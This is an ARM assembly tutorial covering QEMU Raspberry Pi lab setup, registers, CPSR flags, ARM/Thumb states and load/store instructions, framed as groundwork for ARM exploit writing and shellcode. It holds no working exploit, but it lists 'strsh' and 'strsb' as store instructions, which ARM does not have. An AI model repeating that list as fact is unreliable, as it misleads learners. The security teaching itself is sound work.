RASPBERRY PI ON QEMU

Let’s start setting up a Lab VM. We will use Ubuntu and emulate our desired ARM versions inside of it.

First, get the latest Ubuntu version and run it in a VM.

For the QEMU emulation you will need the following:

  1. A Raspbian Image: http://downloads.raspberrypi.org/raspbian/images/raspbian-2017-04-10/ (other versions might work, but Jessie is recommended)
  2. Latest qemu kernel: https://github.com/dhruvvyas90/qemu-rpi-kernel

Inside your Ubuntu VM, create a new folder:

$ mkdir ~/qemu_vms/

Download and place the Raspbian Jessie image to ~/qemu_vms/.

Download and place the qemu-kernel to ~/qemu_vms/.

$ sudo apt-get install qemu-system
$ unzip <image-file>.zip
$ fdisk -l <image-file>

You should see something like this:

Disk 2017-03-02-raspbian-jessie.img: 4.1 GiB, 4393533440 bytes, 8581120 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x432b3940

Device                          Boot  Start     End Sectors Size Id Type
2017-03-02-raspbian-jessie.img1        8192  137215  129024  63M  c W95 FAT32 (LBA)
2017-03-02-raspbian-jessie.img2      137216 8581119 8443904   4G 83 Linux

You see that the filesystem (.img2) starts at sector 137216. Now take that value and multiply it by 512; in this case, 512 * 137216 = 70254592 bytes. Use this value as the offset in the following command:

$ sudo mkdir /mnt/raspbian
$ sudo mount -v -o offset=70254592 -t ext4 ~/qemu_vms/<your-img-file.img> /mnt/raspbian
$ sudo nano /mnt/raspbian/etc/ld.so.preload

Comment out every entry in that file with ‘#’, save and exit with Ctrl-x » Y.

$ sudo nano /mnt/raspbian/etc/fstab

If you see anything with mmcblk0 in fstab, then:

  1. Replace the first entry containing /dev/mmcblk0p1 with /dev/sda1
  2. Replace the second entry containing /dev/mmcblk0p2 with /dev/sda2, save and exit (a rough example of the edited file is shown below).
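
For reference, a typical Raspbian Jessie fstab would look roughly like this after the edit (the exact entries and mount options on your image may differ):

proc            /proc           proc    defaults          0       0
/dev/sda1       /boot           vfat    defaults          0       2
/dev/sda2       /               ext4    defaults,noatime  0       1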
$ cd ~
$ sudo umount /mnt/raspbian

Now you can emulate it on Qemu by using the following command:

$ qemu-system-arm -kernel ~/qemu_vms/<your-kernel-qemu> -cpu arm1176 -m 256 -M versatilepb -serial stdio -append "root=/dev/sda2 rootfstype=ext4 rw" -hda ~/qemu_vms/<your-jessie-image.img> -redir tcp:5022::22 -no-reboot

If you see the GUI of the Raspbian OS, you need to get into a terminal. Press the Win key to open the menu, then navigate with the arrow keys until you reach the Terminal application.

From the terminal, you need to start the SSH service so that you can access it from your host system (the one from which you launched the qemu).
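
On Raspbian Jessie this can usually be done with the following command (a quick sketch; depending on your image, the SSH service may be managed differently):

pi@raspberrypi:~ $ sudo service ssh start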

Now you can SSH into it from your host system with (default password – raspberry):

$ ssh pi@127.0.0.1 -p 5022

For a more advanced network setup see the “Advanced Networking” paragraph below.

Troubleshooting

If SSH doesn’t start in your emulator at startup by default, you can change that inside your Pi terminal with:

$ sudo update-rc.d ssh enable

If your emulated Pi starts the GUI and you want to make it start in console mode at startup, use the following command inside your Pi terminal:

$ sudo raspi-config
>Select 3 – Boot Options
>Select B1 – Desktop / CLI
>Select B2 – Console Autologin

If your mouse doesn’t move in the emulated Pi, click <Windows>, arrow down to Accessories, arrow right, arrow down to Terminal, enter.

Resizing the Raspbian image

Once you are done with the setup, your image has a total size of about 3.9 GB and is nearly full. To enlarge your Raspbian image, follow these steps on your Ubuntu machine:

Create a copy of your existing image:

$ cp <your-raspbian-jessie>.img raspbian.img

Run this command to resize your copy:

$ qemu-img resize raspbian.img +6G

Now start the original Raspbian with the enlarged image attached as a second hard drive:

$ sudo qemu-system-arm -kernel ~/qemu_vms/<kernel-qemu> -cpu arm1176 -m 256 -M versatilepb -serial stdio -append "root=/dev/sda2 rootfstype=ext4 rw" -hda ~/qemu_vms/<your-original-raspbian-jessie>.img -redir tcp:5022::22 -no-reboot -hdb raspbian.img

Log in and run:

$ sudo cfdisk /dev/sdb

Delete the second partition (sdb2) and create a new partition using all available space. Once the new partition is created, use Write to commit the changes, then quit cfdisk.

Resize and check the filesystem on /dev/sdb2, then shut down.

$ sudo resize2fs /dev/sdb2
$ sudo fsck -f /dev/sdb2
$ sudo halt

Now you can start QEMU with your enlarged image:

$ sudo qemu-system-arm -kernel ~/qemu_vms/<kernel-qemu> -cpu arm1176 -m 256 -M versatilepb -serial stdio -append "root=/dev/sda2 rootfstype=ext4 rw" -hda ~/qemu_vms/raspbian.img -redir tcp:5022::22

Advanced Networking

In some cases you might want to access all the ports of the VM you are running in QEMU. For example, you run some binary which opens network port(s) that you want to access/fuzz from your host (Ubuntu) system. For this purpose, we can create a shared network interface (tap0) which allows us to access all open ports (as long as those ports are not bound to 127.0.0.1). Thanks to @0xMitsurugi for suggesting to include this in the tutorial.

This can be done with the following commands on your HOST (Ubuntu) system:

azeria@labs:~ $ sudo apt-get install uml-utilities
azeria@labs:~ $ sudo tunctl -t tap0 -u azeria
azeria@labs:~ $ sudo ifconfig tap0 172.16.0.1/24

After these commands you should see the tap0 interface in the ifconfig output.

azeria@labs:~ $ ifconfig tap0
tap0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 172.16.0.1 netmask 255.255.255.0 broadcast 172.16.0.255
ether 22:a8:a9:d3:95:f1 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

You can now start your QEMU VM with this command:

azeria@labs:~ $ sudo qemu-system-arm -kernel ~/qemu_vms/<kernel-qemu> -cpu arm1176 -m 256 -M versatilepb -serial stdio -append "root=/dev/sda2 rootfstype=ext4 rw" -hda ~/qemu_vms/raspbian.img -net nic -net tap,ifname=tap0,script=no,downscript=no -no-reboot

When the QEMU VM starts, you need to assign an IP to its eth0 interface with the following command:

pi@labs:~ $ sudo ifconfig eth0 172.16.0.2/24

If everything went well, you should be able to reach open ports on the GUEST (Raspbian) from your HOST (Ubuntu) system. You can test this with a netcat (nc) tool (see an example below).
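
For example (a minimal sketch assuming the tap0 setup above and that nc is installed on both systems), start a listener on the GUEST and connect to it from the HOST:

pi@labs:~ $ nc -l -p 4444

azeria@labs:~ $ nc 172.16.0.2 4444

Anything you type on one side should now appear on the other side.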

ARM ASSEMBLY BASICS

Why ARM?

This tutorial is generally for people who want to learn the basics of ARM assembly, especially for those of you who are interested in exploit writing on the ARM platform. You might have already noticed that ARM processors are everywhere around you. When I look around me, I can count far more devices featuring an ARM processor in my house than Intel processors. This includes phones, routers, and not to forget the IoT devices whose sales seem to explode these days. The ARM processor has become one of the most widespread CPU cores in the world. Which brings us to the fact that, like PCs, IoT devices are susceptible to improper input validation abuse such as buffer overflows. Given the widespread usage of ARM-based devices and the potential for misuse, attacks on these devices have become much more common.

Yet, we have more experts specialized in x86 security research than we have for ARM, although ARM assembly language is perhaps the easiest assembly language in widespread use. So, why aren’t more people focusing on ARM? Perhaps because there are more learning resources out there covering exploitation on Intel than there are for ARM. Just think about the great tutorials on Intel x86 Exploit writing by Fuzzy Security or the Corelan Team – Guidelines like these help people interested in this specific area to get practical knowledge and the inspiration to learn beyond what is covered in those tutorials. If you are interested in x86 exploit writing, the Corelan and Fuzzysec tutorials are your perfect starting point. In this tutorial series here, we will focus on assembly basics and exploit writing on ARM.

ARM PROCESSOR VS. INTEL PROCESSOR

There are many differences between Intel and ARM, but the main difference is the instruction set. Intel is a CISC (Complex Instruction Set Computing) processor that has a larger and more feature-rich instruction set and allows many complex instructions to access memory. It therefore has more operations and addressing modes, but fewer registers than ARM. CISC processors are mainly used in normal PCs, workstations, and servers.

ARM is a RISC (Reduced Instruction Set Computing) processor and therefore has a simplified instruction set (100 instructions or less) and more general purpose registers than CISC. Unlike Intel, ARM uses instructions that operate only on registers and uses a Load/Store memory model for memory access, which means that only Load/Store instructions can access memory. This means that incrementing a 32-bit value at a particular memory address on ARM requires three types of instructions (load, increment, and store): first load the value at that address into a register, increment it within the register, and store it back to memory from the register, as sketched below.
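
As a short sketch, incrementing a 32-bit value in memory on ARM would look roughly like this (assuming R0 already holds the address of the value):

ldr r1, [r0]      @ load the value at the address in R0 into R1
add r1, r1, #1    @ increment the value inside the register
str r1, [r0]      @ store the result back to the address in R0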

The reduced instruction set has its advantages and disadvantages. One of the advantages is that instructions can be executed more quickly, potentially allowing for greater speed (RISC systems shorten execution time by reducing the clock cycles per instruction). The downside is that fewer instructions mean a greater emphasis on efficiently writing software with the limited instructions that are available. Also important to note is that ARM has two modes, ARM mode and Thumb mode.

More differences between ARM and x86 are:

  • In ARM, most instructions can be used for conditional execution.
  • The Intel x86 and x86-64 series of processors use the little-endian format.
  • The ARM architecture was little-endian before version 3. Since then, ARM processors are bi-endian and feature a setting which allows for switchable endianness.

There are not only differences between Intel and ARM, but also between different ARM versions themselves. This tutorial series is intended to be as generic as possible so that you get a general understanding of how ARM works. Once you understand the fundamentals, it's easy to learn the nuances of your chosen target ARM version. The examples in this tutorial were created on a 32-bit ARMv6 (Raspberry Pi 1); therefore, the explanations relate to this exact version.

The naming of the different ARM versions might also be confusing:

ARM family    ARM architecture
ARM7          ARM v4
ARM9          ARM v5
ARM11         ARM v6
Cortex-A      ARM v7-A
Cortex-R      ARM v7-R
Cortex-M      ARM v7-M

WRITING ASSEMBLY

Before we can start diving into ARM exploit development we first need to understand the basics of Assembly language programming, which requires a little background knowledge before you can start to appreciate it. But why do we even need ARM Assembly, isn’t it enough to write our exploits in a “normal” programming / scripting language? It is not, if we want to be able to do Reverse Engineering and understand the program flow of ARM binaries, build our own ARM shellcode, craft ARM ROP chains, and debug ARM applications.

You don’t need to know every little detail of the Assembly language to be able to do Reverse Engineering and exploit development, yet some of it is required for understanding the bigger picture. The fundamentals will be covered in this tutorial series. If you want to learn more you can visit the links listed at the end of this chapter.

So what exactly is Assembly language? Assembly language is just a thin syntax layer on top of machine code, which is composed of instructions encoded in binary representations (ones and zeros), which is what our computer understands. So why don't we just write machine code instead? Well, that would be a pain in the ass. For this reason, we will write assembly, ARM assembly, which is much easier for humans to understand. Our computer can't run assembly code itself, because it needs machine code. The tool we will use to assemble the assembly code into machine code is the GNU Assembler from the GNU Binutils project, named as, which works with source files having the *.s extension.

Once you have written your assembly file with the extension *.s, you need to assemble it with as and link it with ld:

$ as program.s -o program.o
$ ld program.o -o program
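
As a minimal example of what such a program.s could contain, here is a sketch that simply exits cleanly (assuming a 32-bit ARM Linux environment like the Raspbian setup from the first chapter, where the exit syscall number is 1):

.section .text
.global _start

_start:
    mov r0, #0      @ exit status 0
    mov r7, #1      @ syscall number for exit on 32-bit ARM Linux
    svc #0          @ invoke the kernel

After assembling and linking it as shown above, running ./program should do nothing visible and simply return to the shell.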

ASSEMBLY UNDER THE HOOD

Let’s start at the very bottom and work our way up to the assembly language. At the lowest level, we have our electrical signals on our circuit. Signals are formed by switching the electrical voltage to one of two levels, say 0 volts (‘off’) or 5 volts (‘on’). Because just by looking we can’t easily tell what voltage the circuit is at, we choose to write patterns of on/off voltages using visual representations, the digits 0 and 1, to not only represent the idea of an absence or presence of a signal, but also because 0 and 1 are digits of the binary system. We then group the sequence of 0 and 1 to form a machine code instruction which is the smallest working unit of a computer processor. Here is an example of a machine language instruction:

1110 0001 1010 0000 0010 0000 0000 0001

So far so good, but we can't remember what each of these patterns (of 0s and 1s) means. For this reason, we use so-called mnemonics, abbreviations that help us remember these binary patterns, where each machine code instruction is given a name. These mnemonics often consist of three letters, but this is not obligatory. We can write a program using these mnemonics as instructions. This program is called an Assembly language program, and the set of mnemonics that is used to represent a computer's machine code is called the Assembly language of that computer. Therefore, Assembly language is the lowest level used by humans to program a computer. The operands of an instruction come after the mnemonic(s). Here is an example:

MOV R2, R1

Now that we know that an assembly program is made up of textual information called mnemonics, we need to get it converted into machine code. As mentioned above, in the case of ARM assembly, the GNU Binutils project supplies us with a tool called as. The process of using an assembler like as to convert from (ARM) assembly language to (ARM) machine code is called assembling.

In summary, we learned that computers understand (respond to) the presence or absence of voltages (signals) and that we can represent multiple signals in a sequence of 0s and 1s (bits). We can use machine code (sequences of signals) to cause the computer to respond in some well-defined way. Because we can’t remember what all these sequences mean, we give them abbreviations – mnemonics, and use them to represent instructions. This set of mnemonics is the Assembly language of the computer and we use a program called Assembler to convert code from mnemonic representation to the computer-readable machine code, in the same way a compiler does for high-level languages.

DATA TYPES

This is part two of the ARM Assembly Basics tutorial series, covering data types and registers.

Similar to high level languages, ARM supports operations on different datatypes.
The data types we can load (or store) can be signed and unsigned words, halfwords, or bytes. The extensions for these data types are: -h or -sh for halfwords, -b or -sb for bytes, and no extension for words. The difference between signed and unsigned data types is:

  • Signed data types can hold both positive and negative values, so the largest positive value they can represent is lower.
  • Unsigned data types can hold larger positive values (including zero) but cannot hold negative values (a short example follows the list below).

Here are some examples of how these data types can be used with the instructions Load and Store:

ldr = Load Word
ldrh = Load unsigned Half Word
ldrsh = Load signed Half Word
ldrb = Load unsigned Byte
ldrsb = Load signed Bytes

str = Store Word
strh = Store unsigned Half Word
strsh = Store signed Half Word
strb = Store unsigned Byte
strsb = Store signed Byte
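
As a small sketch of why the signed variants matter, assume R0 points to a byte in memory holding the value 0xFF:

ldrb  r1, [r0]    @ unsigned byte load: R1 = 0x000000FF (255)
ldrsb r2, [r0]    @ signed byte load:   R2 = 0xFFFFFFFF (-1, sign-extended)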

ENDIANNESS

There are two basic ways of viewing bytes in memory: Little-Endian (LE) or Big-Endian (BE). The difference is the byte-order in which each byte of an object is stored in memory. On little-endian machines like Intel x86, the least-significant-byte is stored at the lowest address (the address closest to zero). On big-endian machines the most-significant-byte is stored at the lowest address. The ARM architecture was little-endian before version 3, since then it is bi-endian, which means that it features a setting which allows for switchable endianness. On ARMv6 for example, instructions are fixed little-endian and data accesses can be either little-endian or big-endian as controlled by bit 9, the E bit, of the Program Status Register (CPSR).
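
As a small illustration (a sketch; the address is made up), a value defined as .word 0x12345678 and stored at address 0x10094 on a little-endian ARM would be laid out in memory byte by byte like this:

gef> x/4xb 0x10094
0x10094: 0x78    0x56    0x34    0x12

The least-significant byte (0x78) sits at the lowest address; on a big-endian machine the order would be reversed.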

ARM REGISTERS

The number of registers depends on the ARM version. According to the ARM Reference Manual, there are 30 general-purpose 32-bit registers, with the exception of ARMv6-M and ARMv7-M based processors. The first 16 registers are accessible in user-level mode; the additional registers are available in privileged software execution (with the exception of ARMv6-M and ARMv7-M). In this tutorial series we will work with the registers that are accessible in any privilege mode: R0-R15. These 16 registers can be split into two groups: general purpose and special purpose registers.

The following table is just a quick glimpse into how the ARM registers could relate to those in Intel processors.

R0-R12: can be used during common operations to store temporary values, pointers (locations in memory), etc. R0, for example, can be referred to as the accumulator during arithmetic operations or for storing the result of a previously called function. R7 becomes useful when working with syscalls, as it stores the syscall number, and R11 helps us keep track of boundaries on the stack, serving as the frame pointer (covered later). Moreover, the function calling convention on ARM specifies that the first four arguments of a function are stored in registers R0-R3.

R13: SP (Stack Pointer). The Stack Pointer points to the top of the stack. The stack is an area of memory used for function-specific storage, which is reclaimed when the function returns. The stack pointer is therefore used for allocating space on the stack, by subtracting the value (in bytes) we want to allocate from the stack pointer. In other words, if we want to allocate a 32 bit value, we subtract 4 from the stack pointer.
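
A small sketch of allocating and releasing space for one 32-bit value on the stack:

sub sp, sp, #4    @ allocate 4 bytes on the stack
str r0, [sp]      @ store R0 in the newly allocated slot
ldr r1, [sp]      @ load it back into R1
add sp, sp, #4    @ release the 4 bytes again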

R14: LR (Link Register). When a function call is made, the Link Register is updated with the address of the instruction right after the call (the return address). Doing this allows the program to return to the "parent" function that initiated the "child" function call after the "child" function is finished.
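
A minimal sketch of how the Link Register is used (BL stores the return address in LR, and BX LR returns to it):

.section .text
.global _start

_start:
    bl  myfunc      @ LR is set to the address of the next instruction (mov r1, #2)
    mov r1, #2      @ execution continues here once myfunc returns
    bkpt

myfunc:
    mov r0, #1      @ work done in the "child" function
    bx  lr          @ return to the address stored in LR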

R15: PC (Program Counter). The Program Counter is automatically incremented by the size of the instruction executed. This size is always 4 bytes in ARM state and 2 bytes in THUMB mode. When a branch instruction is being executed, the PC holds the destination address. During execution, PC stores the address of the current instruction plus 8 (two ARM instructions) in ARM state, and the current instruction plus 4 (two Thumb instructions) in Thumb(v1) state. This is different from x86 where PC always points to the next instruction to be executed.

Let’s look at how PC behaves in a debugger. We use the following program to store the address of pc into r0 and include two random instructions. Let’s see what happens.

.section .text
.global _start

_start:
 mov r0, pc
 mov r1, #2
 add r2, r1, r1
 bkpt

In GDB we set a breakpoint at _start and run it:

gef> br _start
Breakpoint 1 at 0x8054
gef> run

Here is a screenshot of the output we see first:

$r0 0x00000000   $r1 0x00000000   $r2 0x00000000   $r3 0x00000000 
$r4 0x00000000   $r5 0x00000000   $r6 0x00000000   $r7 0x00000000 
$r8 0x00000000   $r9 0x00000000   $r10 0x00000000  $r11 0x00000000 
$r12 0x00000000  $sp 0xbefff7e0   $lr 0x00000000   $pc 0x00008054 
$cpsr 0x00000010 

0x8054 <_start> mov r0, pc     <- $pc
0x8058 <_start+4> mov r1, #2
0x805c <_start+8> add r2, r1, r1
0x8060 <_start+12> bkpt 0x0000
0x8064 andeq r1, r0, r1, asr #10
0x8068 cmnvs r5, r0, lsl #2
0x806c tsteq r0, r2, ror #18
0x8070 andeq r0, r0, r11
0x8074 tsteq r8, r6, lsl #6

We can see that PC holds the address (0x8054) of the next instruction (mov r0, pc) that will be executed. Now let’s execute the next instruction after which R0 should hold the address of PC (0x8054), right?

$r0 0x0000805c   $r1 0x00000000   $r2 0x00000000   $r3 0x00000000 
$r4 0x00000000   $r5 0x00000000   $r6 0x00000000   $r7 0x00000000 
$r8 0x00000000   $r9 0x00000000   $r10 0x00000000  $r11 0x00000000 
$r12 0x00000000  $sp 0xbefff7e0   $lr 0x00000000   $pc 0x00008058 
$cpsr 0x00000010

0x8058 <_start+4> mov r1, #2       <- $pc
0x805c <_start+8> add r2, r1, r1
0x8060 <_start+12> bkpt 0x0000
0x8064 andeq r1, r0, r1, asr #10
0x8068 cmnvs r5, r0, lsl #2
0x806c tsteq r0, r2, ror #18
0x8070 andeq r0, r0, r11
0x8074 tsteq r8, r6, lsl #6
0x8078 adfcssp f0, f0, #4.0

…right? Wrong. Look at the address in R0. While we expected R0 to contain the previously seen PC value (0x8054), it instead holds a value two instructions ahead of it (0x805c). From this example you can see that the debugger shows PC as the address of the instruction about to be executed, but when an instruction reads PC directly it gets the address of the current instruction plus 8 (0x8054 + 8 = 0x805C), i.e. two ARM instructions ahead. This is because older ARM processors always fetched two instructions ahead of the currently executing instruction, and ARM retains this definition to ensure compatibility with earlier processors.

CURRENT PROGRAM STATUS REGISTER

When you debug an ARM binary with gdb, you see something called Flags:

The register $cpsr shows the value of the Current Program Status Register (CPSR), and under that you can see the flags thumb, fast, interrupt, overflow, carry, zero, and negative. These flags represent certain bits in the CPSR register and turn bold when set. The N, Z, C, and V bits are identical to the SF, ZF, CF, and OF bits in the EFLAGS register on x86. These bits are used to support conditional execution in conditionals and loops at the assembly level. We will cover the condition codes used in Conditional Execution and Branching.

The CPSR is a 32-bit register whose left (<-) side holds the most-significant bits and whose right (->) side holds the least-significant bits. Every single field (except for the GE and M sections, along with the reserved ones) is one bit in size. These one-bit fields define various properties of the program's current state.
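
A simplified sketch of this layout (ARMv6/ARMv7, most-significant bit on the left):

bit:    31 30 29 28 27  ...   9  8  7  6  5   4-0
field:   N  Z  C  V  Q  ...   E  A  I  F  T  M[4:0]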

Let’s assume we would use the CMP instruction to compare the numbers 1 and 2. The outcome would be ‘negative’ because 1 – 2 = -1. When we compare two equal numbers, like 2 against 2, the Z (zero) flag is set because 2 – 2 = 0. Keep in mind that the registers used with the CMP instruction won’t be modified, only the CPSR will be modified based on the result of comparing these registers against each other.

This is what it looks like in GDB (with GEF installed): in this example we compare the registers r1 and r0, where r1 = 4 and r0 = 2. These are the flags after executing the cmp r1, r0 operation:

The Carry Flag is set because we use cmp r1, r0 to compare 4 against 2 (4 – 2). In contrast, the Negative flag (N) is set if we use cmp r0, r1 to compare a smaller number (2) against a bigger number (4).
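
A small program you could step through in GDB to reproduce both cases (a sketch of the experiment described above):

.section .text
.global _start

_start:
    mov r0, #2
    mov r1, #4
    cmp r1, r0     @ 4 - 2: positive result, Carry flag set (no borrow)
    cmp r0, r1     @ 2 - 4: negative result, Negative flag set
    bkpt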

Here’s an excerpt from the ARM infocenter:

The APSR contains the following ALU status flags:

N – Set when the result of the operation was Negative.

Z – Set when the result of the operation was Zero.

C – Set when the operation resulted in a Carry.

V – Set when the operation caused oVerflow.

A carry occurs:

  • if the result of an addition is greater than or equal to 2^32
  • if the result of a subtraction is positive or zero
  • as the result of an inline barrel shifter operation in a move or logical instruction.

Overflow occurs if the result of an add, subtract, or compare is greater than or equal to 2^31, or less than -2^31.
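
A short sketch demonstrating both cases with the S suffix (ADDS updates the flags based on the result):

mvn  r0, #0            @ R0 = 0xFFFFFFFF (bitwise NOT of 0)
adds r0, r0, #1        @ 0xFFFFFFFF + 1 wraps to 0: Carry and Zero flags set

mvn  r1, #0x80000000   @ R1 = 0x7FFFFFFF (largest positive signed value)
adds r1, r1, #1        @ 0x7FFFFFFF + 1 becomes 0x80000000: oVerflow and Negative flags set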

ARM & THUMB

ARM processors have two main states they can operate in (let’s not count Jazelle here), ARM and Thumb. These states have nothing to do with privilege levels. For example, code running in SVC mode can be either ARM or Thumb. The main difference between these two states is the instruction set, where instructions in ARM state are always 32-bit, and  instructions in Thumb state are 16-bit (but can be 32-bit). Knowing when and how to use Thumb is especially important for our ARM exploit development purposes. When writing ARM shellcode, we need to get rid of NULL bytes and using 16-bit Thumb instructions instead of 32-bit ARM instructions reduces the chance of having them.

The naming conventions of the ARM versions are more than confusing, and not all ARM versions support the same Thumb instruction sets. At some point, ARM introduced an enhanced Thumb instruction set (pseudo name: Thumbv2) which allows 32-bit Thumb instructions and even conditional execution, which was not possible in the versions prior to that. In order to use conditional execution in Thumb state, the "it" instruction was introduced. However, this instruction was later removed again and exchanged with something that was supposed to make things less complicated, but achieved the opposite. I don't know all the different variations of ARM/Thumb instruction sets across all the different ARM versions, and I honestly don't care. Neither should you. The only thing you need to know is the ARM version of your target device and its specific Thumb support so that you can adjust your code. The ARM Infocenter should help you figure out the specifics of your ARM version (http://infocenter.arm.com/help/index.jsp).

As mentioned before, there are different Thumb versions. The different naming is just for the sake of differentiating them from each other (the processor itself will always refer to it as Thumb).

  • Thumb-1 (16-bit instructions): was used in ARMv6 and earlier architectures.
  • Thumb-2 (16-bit and 32-bit instructions): extends Thumb-1 by adding more instructions and allowing them to be either 16-bit or 32-bit wide (ARMv6T2, ARMv7).
  • ThumbEE: includes some changes and additions aimed at dynamically generated code (code compiled on the device either shortly before or during execution).

Differences between ARM and Thumb:

  • Conditional execution: All instructions in ARM state support conditional execution. Some ARM processor versions allow conditional execution in Thumb by using the IT instruction. Conditional execution leads to higher code density because it reduces the number of instructions to be executed and reduces the number of expensive branch instructions.
  • 32-bit ARM and Thumb instructions: 32-bit Thumb instructions have a .w suffix.
  • The barrel shifter is another unique ARM-mode feature. It can be used to shrink multiple instructions into one. For example, instead of using two instructions for a multiply (multiplying a register by 2 and using MOV to store the result into another register), you can include the multiply inside a MOV instruction by using a left shift by 1: MOV R1, R0, LSL #1   ; R1 = R0 * 2

To switch the state in which the processor executes, one of two conditions has to be met:

  • We can use the branch instruction BX (branch and exchange) or BLX (branch, link, and exchange) and set the destination register's least significant bit to 1. This can be achieved by adding 1 to an offset, like 0x5530 + 1 (see the short sketch after this list). You might think that this would cause alignment issues, since instructions are either 2- or 4-byte aligned. This is not a problem because the processor will ignore the least significant bit.
  • We know that we are in Thumb mode if the T bit in the current program status register is set.
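
A minimal sketch of switching from ARM to Thumb with BX (a pattern that becomes important later when writing shellcode):

.section .text
.global _start

_start:
    .code 32            @ assemble the following as 32-bit ARM instructions
    add r3, pc, #1      @ PC reads as _start+8 here, so R3 = address of thumb_code + 1
    bx  r3              @ LSB of R3 is 1, so the processor switches to Thumb state

thumb_code:
    .code 16            @ assemble the following as 16-bit Thumb instructions
    mov r0, #1
    bkpt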

    INTRODUCTION TO ARM INSTRUCTIONS

    The purpose of this part is to briefly introduce the ARM instruction set and its general use. It is crucial for us to understand how the smallest pieces of the Assembly language operate, how they connect to each other, and what can be achieved by combining them.

    As mentioned earlier, Assembly language is composed of instructions which are the main building blocks. ARM instructions are usually followed by one or two operands and generally use the following template:

    MNEMONIC{S}{condition} {Rd}, Operand1, Operand2

    Due to the flexibility of the ARM instruction set, not all instructions use all of the fields provided in the template. Nevertheless, the purpose of each field in the template is described as follows:

    MNEMONIC     - Short name (mnemonic) of the instruction
    {S}          - An optional suffix. If S is specified, the condition flags are updated on the result of the operation
    {condition}  - Condition that is needed to be met in order for the instruction to be executed
    {Rd}         - Register (destination) for storing the result of the instruction
    Operand1     - First operand. Either a register or an immediate value 
    Operand2     - Second (flexible) operand. Can be an immediate value (number) or a register with an optional shift

    While the MNEMONIC, S, Rd and Operand1 fields are straight forward, the condition and Operand2 fields require a bit more clarification. The condition field is closely tied to the CPSR register’s value, or to be precise, values of specific bits within the register. Operand2 is called a flexible operand, because we can use it in various forms – as immediate value (with limited set of values), register or register with a shift. For example, we can use these expressions as the Operand2:

    #123                    - Immediate value (with limited set of values). 
    Rx                      - Register x (like R1, R2, R3 ...)
    Rx, ASR n               - Register x with arithmetic shift right by n bits (1 ≤ n ≤ 32)
    Rx, LSL n               - Register x with logical shift left by n bits (0 ≤ n ≤ 31)
    Rx, LSR n               - Register x with logical shift right by n bits (1 ≤ n ≤ 32)
    Rx, ROR n               - Register x with rotate right by n bits (1 ≤ n ≤ 31)
    Rx, RRX                 - Register x with rotate right by one bit, with extend

    As a quick example of what different kinds of instructions look like, let's take a look at the following list.

    ADD   R0, R1, R2         - Adds contents of R1 (Operand1) and R2 (Operand2 in a form of register) and stores the result into R0 (Rd)
    ADD   R0, R1, #2         - Adds contents of R1 (Operand1) and the value 2 (Operand2 in a form of an immediate value) and stores the result into R0 (Rd)
    MOVLE R0, #5             - Moves number 5 (Operand2, because the compiler treats it as MOVLE R0, R0, #5) to R0 (Rd) ONLY if the condition LE (Less Than or Equal) is satisfied
    MOV   R0, R1, LSL #1     - Moves the contents of R1 (Operand2 in a form of register with logical shift left) shifted left by one bit to R0 (Rd). So if R1 had value 2, it gets shifted left by one bit and becomes 4. 4 is then moved to R0.

    As a quick summary, let’s take a look at the most common instructions which we will use in future examples.

    MEMORY INSTRUCTIONS: LOAD AND STORE

    ARM uses a load-store model for memory access which means that only load/store (LDR and STR) instructions can access memory. While on x86 most instructions are allowed to directly operate on data in memory, on ARM data must be moved from memory into registers before being operated on. This means that incrementing a 32-bit value at a particular memory address on ARM would require three types of instructions (load, increment, and store) to first load the value at a particular address into a register, increment it within the register, and store it back to the memory from the register.

    To explain the fundamentals of Load and Store operations on ARM, we start with a basic example and continue with three basic offset forms with three different address modes for each offset form. For each example we will use the same piece of assembly code with a different LDR/STR offset form, to keep it simple.

    1. Offset form: Immediate value as the offset
      • Addressing mode: Offset
      • Addressing mode: Pre-indexed
      • Addressing mode: Post-indexed
    2. Offset form: Register as the offset
      • Addressing mode: Offset
      • Addressing mode: Pre-indexed
      • Addressing mode: Post-indexed
    3. Offset form: Scaled register as the offset
      • Addressing mode: Offset
      • Addressing mode: Pre-indexed
      • Addressing mode: Post-indexed

    First basic example

    Generally, LDR is used to load something from memory into a register, and STR is used to store something from a register to a memory address.

    LDR R2, [R0]   @ [R0] - origin address is the value found in R0.
    STR R2, [R1]   @ [R1] - destination address is the value found in R1.

    LDR operation: loads the value at the address found in R0 to the destination register R2.

    STR operation: stores the value found in R2 to the memory address found in R1.

     

    This is how it would look in a functional assembly program:

    .data          /* the .data section is dynamically created and its addresses cannot be easily predicted */
    var1: .word 3  /* variable 1 in memory */
    var2: .word 4  /* variable 2 in memory */
    
    .text          /* start of the text (code) section */ 
    .global _start
    
    _start:
        ldr r0, adr_var1  @ load the memory address of var1 via label adr_var1 into R0 
        ldr r1, adr_var2  @ load the memory address of var2 via label adr_var2 into R1 
        ldr r2, [r0]      @ load the value (0x03) at memory address found in R0 to register R2  
        str r2, [r1]      @ store the value found in R2 (0x03) to the memory address found in R1 
        bkpt             
    
    adr_var1: .word var1  /* address to var1 stored here */
    adr_var2: .word var2  /* address to var2 stored here */

    At the bottom we have our Literal Pool (a memory area in the same code section to store constants, strings, or offsets that others can reference in a position-independent manner) where we store the memory addresses of var1 and var2 (defined in the data section at the top) using the labels adr_var1 and adr_var2. The first LDR loads the address of var1 into register R0. The second LDR does the same for var2 and loads it to R1. Then we load the value stored at the memory address found in R0 to R2, and store the value found in R2 to the memory address found in R1.

    When we load something into a register, the brackets ([ ]) mean: the value found in the register between these brackets is a memory address we want to load something from.

    When we store something to a memory location, the brackets ([ ]) mean: the value found in the register between these brackets is a memory address we want to store something to.

    This sounds more complicated than it actually is, so here is a visual representation of what’s going on with the memory and the registers when executing the code above in a debugger:

    Let’s look at the same code in a debugger.

    gef> disassemble _start
    Dump of assembler code for function _start:
     0x00008074 <+0>:      ldr  r0, [pc, #12]   ; 0x8088 <adr_var1>
     0x00008078 <+4>:      ldr  r1, [pc, #12]   ; 0x808c <adr_var2>
     0x0000807c <+8>:      ldr  r2, [r0]
     0x00008080 <+12>:     str  r2, [r1]
 0x00008084 <+16>:     bkpt   0x0000
    End of assembler dump.

